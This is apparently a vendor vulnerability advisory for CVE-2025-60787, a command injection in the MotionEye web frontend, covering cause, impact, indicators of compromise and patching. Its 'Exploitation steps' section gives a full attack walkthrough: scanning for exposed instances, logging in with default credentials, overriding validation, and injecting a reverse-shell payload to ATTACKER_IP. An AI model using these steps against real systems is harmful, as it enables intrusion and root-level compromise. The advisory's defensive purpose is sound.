CVE-2025-60787
Python vulnerability analysis and mitigation

Overview

CVE-2025-60787 is an OS Command Injection vulnerability in MotionEye, an open-source web frontend for the Motion surveillance software. Unsanitized user input submitted via the web UI (e.g., the image_file_name configuration field) is written directly into Motion configuration files, allowing remote authenticated attackers with admin privileges to achieve arbitrary code execution when the Motion service is restarted. All versions up to and including v0.43.1b4 are affected; the issue was disclosed on October 3, 2025, and a patch was published on November 1, 2025 in v0.43.1b5. It carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Feedly).

Technical details

The root cause is improper input validation (CWE-20) combined with OS Command Injection (CWE-78) and improper output encoding (CWE-116) in MotionEye's config.py. When an admin submits configuration values such as image_file_name through the web UI, the ConfigHandler.set_config() function writes these values without sanitization into /etc/motioneye/camera-*.conf. When MotionEye restarts the Motion service via motionctl.start(), the Motion binary parses these fields as shell-expandable strings, causing injected shell syntax (e.g., $() or backticks) to be executed as OS commands. Client-side JavaScript validation in main.js/ui.js provides the only input guard, which can be trivially bypassed by overriding the configUiValid() function in the browser console (GitHub Advisory, PoC Repo).

Impact

Successful exploitation grants an attacker full remote code execution within the MotionEye container or host environment, running as root. This results in complete compromise of confidentiality, integrity, and availability — including unauthorized data access, arbitrary file creation or deletion, and service disruption. If the container runs with elevated privileges or mounts sensitive host volumes, the attacker may achieve lateral movement to the underlying host system (GitHub Advisory, PoC Repo).

Exploitability

Multiple public exploits are available, including a Metasploit module (motioneye_auth_rce_cve_2025_60787.rb) added to the Rapid7 Metasploit Framework in October 2025, and at least three independent GitHub PoC repositories (Metasploit Module, PoC Repo). The EPSS score is approximately 33.5% (Feedly data) to 57.9% (GitHub Advisory), placing it in the 98th percentile for exploitation likelihood. The vulnerability requires admin-level authentication, which lowers opportunistic risk but is trivially met on default MotionEye deployments that ship with an admin account and a blank password. No specific threat actor attribution or CISA KEV listing has been identified at this time (Feedly, GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing MotionEye instances using Shodan or Censys (search for the default port 8765 or common Docker mappings). Confirm the version via Docker logs or the web UI footer.
  2. Authentication: Log in to the MotionEye web interface using default credentials (admin / blank password) or obtained admin credentials.
  3. Add a camera: A camera must be configured in MotionEye to enable camera-specific settings (required to access the Still Images configuration panel).
  4. Bypass client-side validation: Open the browser developer console (F12) and override the validation function to disable input restrictions:
    configUiValid = function() { return true; };
  5. Inject payload: Navigate to Camera Settings → Still Images → Image File Name. Enter a malicious payload such as:
    $(touch /tmp/pwned).%Y-%m-%d-%H-%M-%S
    For a reverse shell:
    $(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"')").%Y-%m-%d-%H-%M-%S
  6. Apply settings: Click Apply; MotionEye writes the unsanitized value into /etc/motioneye/camera-1.conf under the picture_filename directive.
  7. Trigger execution: Wait for or trigger a MotionEye/Motion service restart. The Motion binary reads the config file and executes the injected shell command.
  8. Achieve RCE: The attacker receives a reverse shell or observes the artifact (e.g., /tmp/pwned) confirming code execution with root privileges (GitHub Advisory, PoC Repo).

Indicators of compromise

  • Network: Unexpected outbound connections from the MotionEye host/container to external IPs on non-standard ports (e.g., 4444); unusual DNS lookups originating from the MotionEye process.
  • File System: Unexpected files created in /tmp/ (e.g., /tmp/test, /tmp/pwned) with root ownership; modifications to /etc/motioneye/camera-*.conf containing shell metacharacters ($(), backticks, ;, |) in picture_filename or snapshot_filename fields; new cron jobs or scripts added by the MotionEye service account.
  • Logs: MotionEye web access logs showing POST requests to configuration endpoints with encoded or unusual payloads in image_file_name parameters; Motion daemon logs showing unexpected command execution errors or shell process spawning.
  • Process: Unusual child processes spawned by the Motion binary (e.g., bash, python3, nc, curl, wget); reverse shell processes with network connections to external IPs (GitHub Advisory, PoC Repo).

Mitigation and workarounds

Upgrade MotionEye to version 0.43.1b5 or later, which is the patched release that addresses this vulnerability (GitHub Advisory). As an interim workaround, apply input sanitization in config.py by stripping or rejecting shell metacharacters ($, `, (, ), ;, &, |, <, >) from filename fields before writing to configuration files (PoC Repo). Additionally: restrict administrative access to the MotionEye interface using network-level controls (firewall rules, VPN); change the default admin password immediately; avoid running the MotionEye container with privileged mode or sensitive host volume mounts to limit blast radius.

Community reactions

Rapid7 highlighted the vulnerability in their Metasploit weekly wrap-up blog post dated October 17, 2025, noting the addition of a dedicated exploit module (Rapid7 Blog). Check Point Research published an advisory (CPAI-2025-9557) covering the vulnerability (Check Point Advisory). Community discussion was observed on Bluesky, and the vulnerability was featured in CTF writeups (e.g., HackTheBox CCTV machine), indicating broad researcher interest (Feedly).

Additional resources


SourceThis report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-59714HIGH7.1
  • Python logoPython
  • cpe:2.3:a:openwebui:open_webui
NoYesAug 13, 2026
CVE-2026-48099HIGH7.1
  • Python logoPython
  • python3-wsgidav+pam
NoYesAug 13, 2026
CVE-2026-45725HIGH7.1
  • Python logoPython
  • compliance-trestle
NoYesAug 13, 2026
CVE-2026-73652HIGH7.1
  • Python logoPython
  • vantage6
NoNoAug 13, 2026
CVE-2026-45774MEDIUM6.9
  • Python logoPython
  • compliance-trestle
NoYesAug 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management